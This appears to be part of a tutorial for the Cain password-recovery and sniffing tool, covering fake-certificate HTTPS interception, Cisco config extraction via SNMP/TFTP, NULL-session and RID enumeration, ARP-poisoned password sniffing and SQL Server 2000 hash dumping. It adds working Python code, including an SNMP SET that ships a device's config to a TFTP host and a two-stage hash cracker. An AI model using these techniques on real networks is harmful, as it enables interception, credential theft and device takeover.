This part of the tutorial continues with the following topics:
Certificates Collector
Cisco Config Downloader/Uploader
Mac Scanner
Network Enumerator
Promiscuous-mode scanner
Sniffer
SQL Server 2000 Password Extractor
Traceroute
Certificates Collector
Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is used automatically by the HTTPS sniffer filter, but you can also run it manually to create a list of pre-calculated fake certificate files. Why fake? Because the program replaces the public key in each collected certificate with one from a key pair generated locally, then re-signs the result. Holding the matching private key, APR-HTTPS can decrypt and re-encrypt HTTPS traffic while sitting as a Man-in-the-Middle between the hosts poisoned by APR.
A fake certificate is self-signed by Cain, so the client’s browser is expected to pop up a dialog warning that it comes from an untrusted certification authority; however, because all the other fields in the certificate (subject name, validity period and so on) are copied from the real one, many users simply ignore the warning. Comparing the certificate fingerprint or the issuer name against a known-good value is what exposes the substitution.
Fake certificates are stored in the “Certs” subdirectory of the program’s installation path, and the list of those currently available to APR-HTTPS is kept in the file CERT.LST in the program’s directory. You can edit this list file by hand to instruct APR-HTTPS to inject the certificate of your choice into connections from APR victims to a given HTTPS server address.
Usage
The feature is used automatically by the HTTPS sniffer filter. You can use the + button on the toolbar to manually grab and prepare a list of fake certificates; non-standard ports can be specified using the syntax “hostname:port” or “ip address:port”.
Cisco Config Downloader/Uploader
This feature allows you to download or upload the configuration file of Cisco devices via SNMP and TFTP. It supports routers and switches that implement the OLD-CISCO-SYSTEM-MIB or the newer CISCO-CONFIG-COPY-MIB; for details on those MIBs refer to the Cisco web site.
How it works
1) Cain asks the Cisco device to transfer its configuration file using an SNMP SET request. The request is built from proprietary Cisco OIDs the vendor provides for this purpose; the variable bindings also carry parameters such as the transfer protocol, the server IP address and the file names, telling the device where to send, or fetch, its configuration file.
2) The device then starts the file transfer using the protocol specified in the request (Cain sets it to TFTP for simplicity).
3) Cain opens a listening TFTP socket and handles the transfer itself, so no separate TFTP server is required: when uploading, the program sends the configuration file to the device; when downloading, it receives it.
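The SNMP side of step 1, as an added example (not Cain’s code): the SET request that asks a device to copy its running-config to a TFTP server, encoded by hand in BER so that only the Python standard library is needed. The OIDs are the public CISCO-CONFIG-COPY-MIB (ccCopyTable) and OLD-CISCO-SYSTEM-MIB (writeNet) definitions; the community string, request id, addresses, row index and file name are made up for the example.

```python
"""Added example (not Cain's code): the SNMPv2c SET request a tool like the
Cisco Config Downloader sends to make a Cisco device copy its running-config
to a TFTP server.  BER is hand-rolled so only the standard library is needed.
OIDs follow the public CISCO-CONFIG-COPY-MIB and OLD-CISCO-SYSTEM-MIB; the
community string, request id, addresses and file name are made up."""
import socket

# CISCO-CONFIG-COPY-MIB: ccCopyEntry columns used below
CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"
COL_PROTOCOL, COL_SRC_TYPE, COL_DST_TYPE = 2, 3, 4
COL_SERVER_ADDR, COL_FILENAME, COL_ROW_STATUS = 5, 6, 14
TFTP, NETWORK_FILE, RUNNING_CONFIG, CREATE_AND_GO = 1, 1, 4, 4
# OLD-CISCO-SYSTEM-MIB: setting writeNet.<tftp-server-ip> to a file name
# tells the device to write its running-config to that TFTP server
WRITE_NET = "1.3.6.1.4.1.9.2.1.55"


def ber_length(n):
    """Definite-form BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_length(len(body)) + body


def encode_integer(value):
    """ASN.1 INTEGER: two's complement, shortest form that keeps a sign bit."""
    size = max(1, (value.bit_length() + 8) // 8)
    return tlv(0x02, value.to_bytes(size, "big", signed=True))


def encode_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(chunk)
    return tlv(0x06, bytes(out))


def encode_octets(data):
    return tlv(0x04, data)


def encode_ipaddress(dotted):
    return tlv(0x40, socket.inet_aton(dotted))  # SNMP IpAddress, [APPLICATION 0]


def snmp_set(community, request_id, varbinds):
    """SNMPv2c message wrapping a SetRequest-PDU (tag 0xA3).
    varbinds: list of (oid string, already-encoded value)."""
    vbl = b"".join(tlv(0x30, encode_oid(oid) + val) for oid, val in varbinds)
    pdu = tlv(0xA3, encode_integer(request_id) + encode_integer(0)
              + encode_integer(0) + tlv(0x30, vbl))
    return tlv(0x30, encode_integer(1) + encode_octets(community.encode()) + pdu)


def config_copy_request(community, request_id, tftp_server, filename, row=1111):
    """One createAndGo row in ccCopyTable: running-config -> TFTP network file.
    The row index is arbitrary; it just has to be unused on the device."""
    col = lambda c: f"{CC_COPY_ENTRY}.{c}.{row}"
    return snmp_set(community, request_id, [
        (col(COL_PROTOCOL), encode_integer(TFTP)),
        (col(COL_SRC_TYPE), encode_integer(RUNNING_CONFIG)),
        (col(COL_DST_TYPE), encode_integer(NETWORK_FILE)),
        (col(COL_SERVER_ADDR), encode_ipaddress(tftp_server)),
        (col(COL_FILENAME), encode_octets(filename.encode())),
        (col(COL_ROW_STATUS), encode_integer(CREATE_AND_GO)),
    ])


def writenet_request(community, request_id, tftp_server, filename):
    """Same job for devices that only implement OLD-CISCO-SYSTEM-MIB."""
    return snmp_set(community, request_id,
                    [(f"{WRITE_NET}.{tftp_server}", encode_octets(filename.encode()))])


if __name__ == "__main__":
    # Sending the request is one UDP datagram to port 161 carrying the RW
    # community in clear text.  The device then connects back to UDP/69 on
    # tftp_server, so a TFTP listener must already be running there.
    msg = config_copy_request("private", 0x1234, "192.0.2.10", "running.cfg")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(msg, ("192.0.2.1", 161))
```

Everything in that datagram, the RW community included, travels unencrypted, which is why a sniffer on the path (or the SNMP filter of this same program) recovers it; it is also the reason the requirements below insist on the Read/Write string rather than the Read-Only one, since a SET with the wrong community is simply dropped.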
Usage
To download a configuration from a device press the “Insert” key on the keyboard or click the icon with the blue + on the toolbar, then provide the IP address of the SNMP-enabled device and the correct Read/Write community string. To upload a configuration use the corresponding function in the list’s pop-up menu.
Limitations
This feature will not work if network restrictions, such as ACLs or firewall rules, block the protocols involved (SNMP on UDP/161 towards the device, TFTP on UDP/69 towards your host). Since the TFTP transfer is initiated by the device itself, dynamic NAT between you and the device is a problem as well: the device must be able to reach your IP address directly.
Requirements
- CCDU works on Cisco routers and switches that support the OLD-CISCO-SYSTEM-MIB or the newer CISCO-CONFIG-COPY-MIB. PIX firewalls do not support those MIBs.
- You also need the correct Read/Write SNMP community string (e.g. “private”); the Read-Only one is not enough.
MAC Scanner
The MAC address scanner is a very fast IP-to-MAC address resolver based on ARP Request/Reply packets. It takes as input a range of IP addresses on the current subnet and resolves the MAC addresses associated with those IPs. The scanner includes an OUI database providing MAC vendor information; this is useful to quickly identify switches, routers, load balancers and firewalls present in the LAN.
Because ARP packets cannot cross routers or VLANs, this feature can resolve MAC addresses in the local broadcast domain only. The OUI database is a normalized version of the IEEE OUI list available at: http://standards.ieee.org/regauth/oui/index.shtml.
Once active hosts are found, you can also resolve their host names with the “Resolve Host Name” function in the list’s pop-up menu.
Tip
The scanner cannot resolve MAC addresses if the network card is not correctly configured, since the ARP requests are built from the adapter’s own IP and MAC address. You should also check the APR spoofing options in the configuration dialog before starting a scan.
Prerequisites
The sniffer must be activated.
Usage
The scanner’s configuration dialog is opened by pressing the “Insert” key on the keyboard or clicking the icon with the blue + on the toolbar; then select the range of IP addresses to resolve.
Network Enumerator
The Network Enumerator uses the native Windows network management functions (the Net* API) to discover what is present on the network. It allows quick identification of Domain Controllers, SQL Servers, Print Servers, Remote Access (dial-in) Servers, Novell Servers, Apple File Servers, Terminal Servers and so on, and where possible displays the version of their operating system.
The left tree is used to browse the network and to connect to remote machines; once connected to a server you can also enumerate the user names, groups, services and shares present on it. By default the program connects to the remote IPC$ share using the currently logged-on local user and, if that fails, a NULL session (anonymous session); it is also possible to specify the credentials to be used for the connection. The Quick List can be used to insert IP addresses of hosts that are not visible when browsing the network.
When enumerating users, Cain also extracts their Security Identifier (SID) and can identify the built-in Administrator account even if it has been renamed. This is done by looking at the account’s RID, the last sub-authority of the SID: the RID of the built-in Administrator account is always 500, whatever its display name.
Windows NT and later have a security feature that restricts the ability of anonymous logon users (NULL session connections) to list account names and enumerate share names. It is enabled by setting the value “RestrictAnonymous” to 1 under the registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
If the program cannot enumerate users because of this restriction, it automatically starts the SID Scanner and extracts them using the same methodology as the well-known tool sid2user by Evgenii B. Rudnyi: the domain part of a known SID is combined with sequential RIDs, and each resulting SID is looked up to obtain the account name.
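The RID trick and the sid2user fallback described above, as an added example (not Cain’s code): a parser for the binary SID format the Windows API hands back, a check that flags a renamed built-in account by its RID, and the candidate-SID generation that sid2user-style enumeration resolves one by one. The account names and the domain SID are constructed for the example.

```python
"""Added example (not Cain's code): how the Network Enumerator's RID trick
works.  A Windows SID in binary form is: revision (1 byte), sub-authority
count (1 byte), 48-bit identifier authority (big-endian) and N 32-bit
sub-authorities (little-endian); the last sub-authority is the RID.  The
accounts and domain SID below are constructed for the example."""
import struct

# RIDs fixed by Windows for the built-in accounts, whatever they are named
WELL_KNOWN_USER_RIDS = {500: "Administrator", 501: "Guest"}


def parse_sid(blob):
    """Binary SID -> 'S-1-5-21-...' string."""
    revision, count = blob[0], blob[1]
    if revision != 1 or len(blob) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def sid_to_bytes(sid):
    """The inverse: the form LookupAccountName and the SAM return."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def rid(sid):
    return int(sid.rsplit("-", 1)[1])


def domain_sid(sid):
    """Everything but the RID: identifies the machine or domain."""
    return sid.rsplit("-", 1)[0]


def flag_renamed_accounts(accounts):
    """accounts: {name: binary SID}.  Returns {name: real identity} for
    accounts whose display name hides a well-known RID, e.g. a renamed
    Administrator (RID 500)."""
    flagged = {}
    for name, blob in accounts.items():
        r = rid(parse_sid(blob))
        real = WELL_KNOWN_USER_RIDS.get(r)
        if real and real != name:
            flagged[name] = f"{real} (RID {r})"
    return flagged


def sid2user_candidates(any_account_sid, start=500, stop=1100):
    """When RestrictAnonymous blocks user listing, the sid2user approach takes
    one known SID, keeps its domain part and walks sequential RIDs; each
    candidate is then resolved to a name with LookupAccountSid (not done here)."""
    base = domain_sid(any_account_sid)
    return [f"{base}-{r}" for r in range(start, stop)]


# Constructed directory: "svc_backup" is the renamed built-in Administrator
SAMPLE_ACCOUNTS = {
    "svc_backup": sid_to_bytes("S-1-5-21-1004336348-1177238915-682003330-500"),
    "Guest": sid_to_bytes("S-1-5-21-1004336348-1177238915-682003330-501"),
    "alice": sid_to_bytes("S-1-5-21-1004336348-1177238915-682003330-1001"),
}
```

Renaming the Administrator account therefore buys nothing against an enumerator that sees SIDs, and RestrictAnonymous=1 only removes the listing, not the lookups: the candidate SIDs still resolve through LookupAccountSid over a NULL session unless the stricter setting that forbids anonymous SID/name translation is in force as well.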
Tip
To perform an Anonymous connection (NULL Session) to the target host, leave the user name and password fields empty in the credentials dialog.
Usage
Enumerations are launched by browsing the tree on the left in the Network tab. To specify credentials for a network connection, right-click the target machine and use the “Connect As” function in the pop-up menu.
Promiscuous-mode Scanner
The Promiscuous-mode scanner lets you identify sniffers and network Intrusion Detection Systems present on the LAN. This feature is included in the MAC Scanner and relies on the responses received to various tests based on ARP packets sent to unusual destination MAC addresses: a network card that is filtering correctly discards such frames, while a card in promiscuous mode passes them up to the IP stack, which then answers the ARP request.
You can select the tests to perform from the MAC Scanner dialog; positive results are reported in the “Hosts” list with an * in the corresponding column.
Be warned that not all operating systems respond in the same way; an example of the results from a Windows machine follows:
[Screenshot: ARP test results with the network card not in promiscuous mode (not sniffing)]
[Screenshot: ARP test results with the network card in promiscuous mode (sniffing)]
As the screenshots show, Windows machines that are not sniffing the network normally respond to ARP Test (Broadcast 16-bit) and ARP Test (Multicast group1) only. When a sniffer is active and the network card is in promiscuous mode, they start to respond to ARP Test (Broadcast 31-bit) as well.
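The frames behind both the MAC Scanner and the Promiscuous-mode Scanner, as one added example (not Cain’s code): an ARP who-has builder whose Ethernet destination can be set to the broadcast address for a normal scan or to one of the bogus test addresses, a parser for the replies, the OUI lookup, and the verdict logic from the Windows observation above. The destination MACs listed for the tests are an assumption taken from the PromiScan method, since the page names the tests but not the addresses; the OUI excerpt and the sample reply are constructed.

```python
"""Added example (not Cain's code): the frames behind the MAC Scanner and the
Promiscuous-mode Scanner.  build_arp_request() produces an Ethernet II frame
carrying an ARP who-has; the MAC scan sends it to the broadcast address, the
promiscuous tests send the same ARP payload to deliberately bogus Ethernet
destinations that a properly filtering card drops but a card in promiscuous
mode passes to the IP stack, which then answers.  The test MACs are those of
the PromiScan method (an assumption: the page names the tests but not the
addresses).  The OUI excerpt and the sample reply are constructed."""
import struct

ETH_P_ARP = 0x0806
BROADCAST = "ff:ff:ff:ff:ff:ff"
# Ethernet destination used by each promiscuous-mode test (assumed values)
PROMISC_TESTS = {
    "Broadcast 31-bit": "ff:ff:ff:ff:ff:fe",
    "Broadcast 16-bit": "ff:ff:00:00:00:00",
    "Broadcast 8-bit": "ff:00:00:00:00:00",
    "Group 0": "01:00:00:00:00:00",
    "Multicast group1": "01:00:5e:00:00:01",
    "Multicast group3": "01:00:5e:00:00:03",
}
# Tests a Windows host answers even with a correctly filtering card (per the page)
WINDOWS_NORMAL = {"Broadcast 16-bit", "Multicast group1"}
# Three entries from the IEEE OUI list, enough for the example
OUI = {"00:00:0c": "Cisco Systems", "00:50:56": "VMware", "00:1b:21": "Intel"}


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_request(src_mac, src_ip, target_ip, dst_mac=BROADCAST):
    """Ethernet II header + 28-byte ARP request (42 bytes).  dst_mac is the
    Ethernet destination the promiscuous tests vary; the ARP target hardware
    address stays all-zero as in a normal who-has."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, hlen, plen, request
    arp += mac_bytes(src_mac) + ip_bytes(src_ip) + bytes(6) + ip_bytes(target_ip)
    return eth + arp


def build_arp_reply(src_mac, src_ip, dst_mac, dst_ip):
    """What a host sends back; used here only to construct the sample below."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += mac_bytes(src_mac) + ip_bytes(src_ip) + mac_bytes(dst_mac) + ip_bytes(dst_ip)
    return eth + arp


def parse_arp_reply(frame):
    """(sender_mac, sender_ip) for an ARP reply, None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    if struct.unpack("!HHBBH", frame[14:22]) != (1, 0x0800, 6, 4, 2):
        return None
    return mac_str(frame[22:28]), ip_str(frame[28:32])


def vendor(mac):
    return OUI.get(mac[:8].lower(), "unknown")


def promiscuous_suspects(results, normal=WINDOWS_NORMAL):
    """results: {test name: True if the host answered}.  Returns the tests
    that point to a promiscuous card, i.e. answers a filtering card would
    never give.  Pass a different `normal` set for other operating systems."""
    return sorted(t for t, answered in results.items() if answered and t not in normal)


# Constructed sample: the gateway 192.168.1.1 (a Cisco OUI) answering us
SAMPLE_REPLY = build_arp_reply("00:00:0c:11:22:33", "192.168.1.1",
                               "00:1b:21:aa:bb:cc", "192.168.1.10")

if __name__ == "__main__":
    # Live use (Linux, root): send each test frame to one host and see who answers.
    import socket
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind(("eth0", 0))
    sock.settimeout(1.0)
    for name, dst in PROMISC_TESTS.items():
        sock.send(build_arp_request("00:1b:21:aa:bb:cc", "192.168.1.10", "192.168.1.1", dst))
        try:
            print(name, parse_arp_reply(sock.recv(65535)))
        except socket.timeout:
            print(name, None)
```

The baseline set matters: feed promiscuous_suspects() the tests a given operating system answers when it is not sniffing, or every host of that OS will be flagged.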
Prerequisites
The sniffer must be activated.
Limitations
Because ARP packets cannot cross routers or VLANs, this feature works only inside your broadcast domain.
Usage
Select the tests to run from the MAC Scanner dialog; they are executed together with the MAC scan and the results appear in the “Hosts” list.
Sniffer
Cain’s sniffer is principally focused on capturing passwords and authentication information travelling on the network. It should not be compared to professional tools such as Observer, SnifferPro or Ethereal, but unlike commercial protocol analyzers it has been developed to work on switched networks by means of APR (ARP Poison Routing), another feature included in the program.
Protocol Filters
A BPF (Berkeley Packet Filter) hard-coded into the protocol driver performs the initial traffic screening. The filter instructs the driver to process only ARP and IP traffic; other protocols, NetBEUI for example, are not processed.
Password Filters
The sniffer includes several password filters that can be enabled or disabled from the main configuration dialog; they are used to capture credentials from the following protocols:
Cain’s sniffer filters are designed to survive in an unreliable environment such as a network under ARP poison attack; Cain uses separate protocol state machines to extract from the packets all the information needed to recover the plaintext form of a transmitted password. Some authentication protocols use a challenge-response mechanism, so the sniffer needs parameters from both the Client->Server and the Server->Client direction. On switched networks this can be achieved with a mirror port on the switch, or when APR reaches the FULL-Routing state.
When APR (ARP Poison Routing) is enabled, the sniffer must process packets it would normally never see and also re-route them to their correct destination; this can cause performance bottlenecks on heavily loaded networks, so be careful. APR’s main advantage is that it enables sniffing on switched networks and also permits the analysis of encrypted protocols such as HTTPS and SSH-1, since the Man-in-the-Middle position lets Cain interpose its own keys.
Passwords and hashes are stored in .LST files in the program’s directory. These are comma-separated text files, so you can view or import them with a text editor or spreadsheet (e.g. POP3.LST contains passwords and hashes sniffed from the POP3 protocol).
For the HTTPS, SSH-1 and Telnet protocols entire sessions are decrypted and dumped into text files named after the protocol and a timestamp, following this naming convention:
(e.g.: Telnet-20041116135246796-1141.txt)
Off-line capture file processing
The sniffer can also process capture files (from Ethereal, Tcpdump and WinPcap) in off-line mode. Captures are imported using the “open file” button on the sniffer’s toolbar; when processing traffic off-line all APR functions are automatically disabled.
Routing Protocols Analysis
Routing protocols such as VRRP, HSRP, RIP, OSPF and EIGRP are also analyzed by the program. This allows quick identification of the subnet’s routers and perimeter.
For EIGRP and RIP, the “Routes Extractor” feature also dumps the routing table exchanged between routers. This is only supported when these protocols run without authentication.
Usage
The sniffer is activated and deactivated with the corresponding toolbar button; its parameters are configured from the main configuration dialog.
Requirements
- Supported Ethernet network adapter
SQL Server 2000 Password Extractor
Microsoft SQL Server 2000 stores the credentials of its logins in the “master” database. Passwords are stored as salted SHA-1 hashes in the table “sysxlogins”; a hash cannot be reversed, but it can be attacked with wordlists. This feature connects to the server via ODBC and dumps all SQL login hashes into the MSSQL Hashes Cracker list.
How it works
It connects to the server via ODBC and runs the following SQL statement:
select name, password from master..sysxlogins
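What the password column returned by that query contains, and why the MSSQL Hashes Cracker can work through it quickly, as an added example (not Cain’s code): SQL Server 2000 stores a 46-byte value made of the header 0x0100, a 4-byte salt, the SHA-1 of the UTF-16LE password plus salt, and the SHA-1 of the upper-cased password plus salt. The second, case-insensitive hash lets a cracker find the word first and only then search over case variants. The sample row, its salt and the word list are constructed for the example.

```python
"""Added example (not Cain's code): the format of the hashes this feature
pulls out of master..sysxlogins and how a cracker attacks them.  SQL Server
2000's pwdencrypt() output is 46 bytes:
0x0100 | 4-byte salt | SHA1(UTF-16LE(password) + salt) |
SHA1(UTF-16LE(UPPER(password)) + salt).  The second, case-insensitive hash
is what makes these cheap to crack: find the letters first, then only the
case variants of one word remain.  The hash and word list are constructed."""
import hashlib
import os
from itertools import product

HEADER = b"\x01\x00"


def sql2000_pwdencrypt(password, salt=None):
    """Reproduce what SQL Server 2000 stores for a login."""
    salt = os.urandom(4) if salt is None else salt
    case_sensitive = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    case_insensitive = hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return HEADER + salt + case_sensitive + case_insensitive


def split_hash(blob):
    """-> (salt, case-sensitive SHA-1, case-insensitive SHA-1)."""
    if len(blob) != 46 or blob[:2] != HEADER:
        raise ValueError("not a SQL Server 2000 password hash")
    return blob[2:6], blob[6:26], blob[26:46]


def case_variants(word):
    """All upper/lower spellings of a word (2**letters of them, so cap the
    word length in real use)."""
    options = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    for combo in product(*options):
        yield "".join(combo)


def crack(blob, wordlist):
    """Two-stage attack: the case-insensitive half identifies the word ignoring
    case, the case-sensitive half then pins down the exact spelling."""
    salt, case_sensitive, case_insensitive = split_hash(blob)
    for word in wordlist:
        if hashlib.sha1(word.upper().encode("utf-16-le") + salt).digest() != case_insensitive:
            continue
        for candidate in case_variants(word):
            if hashlib.sha1(candidate.encode("utf-16-le") + salt).digest() == case_sensitive:
                return candidate
    return None


# Constructed: one row as returned by 'select name, password from master..sysxlogins'
SAMPLE_ROW = ("sa", sql2000_pwdencrypt("S3cret!", salt=b"\xde\xad\xbe\xef"))
SAMPLE_WORDLIST = ["password", "admin", "s3cret!", "sa"]
```

The case-insensitive half is the weakness: a wordlist only has to match the letters, and the exact capitalisation costs at most 2^n extra hashes for an n-letter word rather than a full second dictionary pass.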
Usage
To dump the hashes go to the MSSQL Hashes Cracker and press the “Insert” key on the keyboard or click the icon with the blue + on the toolbar. Choose the Data Source Name (DSN) of the target server and provide system administrator (sa) credentials.
Requirements
This feature requires SQL Server administrator (sysadmin, e.g. the sa login) privileges on the target server.
Traceroute
Cain’s traceroute is an improved version of the Windows tool “tracert.exe”.
The widespread use of perimeter defences on the modern Internet sometimes makes it impossible to reach the desired destination with the standard utility: firewalls can drop ICMP packets without sending back any ICMP response, so the path to the target host cannot be traced completely. UDP or TCP probes can be used to get past common firewall restrictions (a TCP probe to a port the target publishes, such as 80 on a web server, looks like legitimate traffic), so Cain’s traceroute supports all three protocols.
Consider for example the following ICMP trace to www.somesite.com:
The ICMP traceroute stops at hop 18; probably something there drops ICMP packets. The same trace, this time using TCP packets, gets past that firewall and into their network.
As you can see, the TCP traceroute reached the destination host (www.somesite.com), discovering some routers inside their organisation along the way.
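The receive side of such a traceroute, as an added example (not Cain’s code): whatever the probe (ICMP echo, UDP datagram or TCP SYN sent with a rising IP TTL), routers on the path answer with ICMP Time Exceeded quoting the start of the probe, so one classifier serves all three; only the final hop differs (a TCP SYN/ACK or RST from the target, ICMP Port Unreachable for UDP), and an ICMP Destination Unreachable with an “administratively prohibited” code is the firewall announcing itself. All packets and addresses (from 192.0.2.0/24) are constructed for the example; the live probing sketched at the end needs a raw socket.

```python
"""Added example (not Cain's code): the receive side of an ICMP/UDP/TCP
traceroute.  Whatever the probe (ICMP echo, UDP datagram or TCP SYN sent with
a rising IP_TTL), routers on the path answer with ICMP Time Exceeded quoting
the start of our probe, so one classifier serves all three; only the final
hop differs (TCP SYN/ACK or RST, ICMP Port Unreachable for UDP).  The packets
are constructed for the example; live probing under __main__ needs root."""
import socket
import struct

ICMP_DEST_UNREACH, ICMP_TIME_EXCEEDED = 3, 11
PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17


def checksum(data):
    """RFC 1071 one's-complement sum; 0 for data carrying a valid checksum."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def classify_reply(packet, probe_dst, probe_dport):
    """packet: an IPv4 packet read from a raw socket.  Returns ("hop", router),
    ("destination", ip), ("filtered", ip) or None if unrelated to our probe."""
    ihl = (packet[0] & 0x0F) * 4
    src = socket.inet_ntoa(packet[12:16])
    if packet[9] == PROTO_TCP:  # the target of a TCP probe answers directly
        sport, flags = struct.unpack("!H", packet[ihl:ihl + 2])[0], packet[ihl + 13]
        ok = src == probe_dst and sport == probe_dport and flags & 0x16  # SYN, RST or ACK
        return ("destination", src) if ok else None
    if packet[9] != PROTO_ICMP:
        return None
    icmp = packet[ihl:]
    if len(icmp) < 36 or checksum(icmp) != 0:
        return None
    itype, code = icmp[0], icmp[1]
    if itype not in (ICMP_TIME_EXCEEDED, ICMP_DEST_UNREACH):
        return None
    quoted = icmp[8:]  # our probe's IP header + first 8 bytes of its payload
    q_ihl = (quoted[0] & 0x0F) * 4
    q_dst = socket.inet_ntoa(quoted[16:20])
    q_dport = struct.unpack("!H", quoted[q_ihl + 2:q_ihl + 4])[0]
    if (q_dst, q_dport) != (probe_dst, probe_dport):
        return None  # someone else's probe or an unrelated error
    if itype == ICMP_TIME_EXCEEDED:
        return ("hop", src)
    if quoted[9] == PROTO_UDP and code == 3:
        return ("destination", src)  # port unreachable: the UDP probe arrived
    return ("filtered", src)  # e.g. code 13, communication administratively prohibited


def build_icmp_error(router, our_ip, probe_dst, probe_dport, proto, itype, code):
    """Constructed router reply for the example: quotes a TTL-1 probe header."""
    quoted = ipv4_header(our_ip, probe_dst, proto, 8, ttl=1) + struct.pack("!HHI", 40000, probe_dport, 0)
    body = struct.pack("!BBHI", itype, code, 0, 0) + quoted
    body = body[:2] + struct.pack("!H", checksum(body)) + body[4:]
    return ipv4_header(router, our_ip, PROTO_ICMP, len(body)) + body


def build_tcp_reply(from_ip, our_ip, sport, dport, flags):
    """Constructed TCP segment (SYN/ACK = 0x12, RST/ACK = 0x14) from the target."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 1, 0x50, flags, 65535, 0, 0)
    return ipv4_header(from_ip, our_ip, PROTO_TCP, len(tcp)) + tcp


if __name__ == "__main__":
    # UDP traceroute (root needed for the raw ICMP receive socket).  For a TCP
    # traceroute send SYNs from a raw socket with the same rising TTL instead.
    target, dport = "192.0.2.200", 33434
    rx = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    rx.settimeout(2)
    for ttl in range(1, 31):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as tx:
            tx.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)
            tx.sendto(b"", (target, dport))
        try:
            verdict = classify_reply(rx.recv(1500), target, dport)
        except socket.timeout:
            verdict = ("*", None)
        print(ttl, verdict)
        if verdict and verdict[0] == "destination":
            break
```

Matching on the quoted destination address and port is what keeps a traceroute honest on a busy host: every ICMP error arriving on the raw socket is seen, and only the ones quoting our own probe should be counted as hops.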
Usage
Choose the protocol type, select the target and press Start.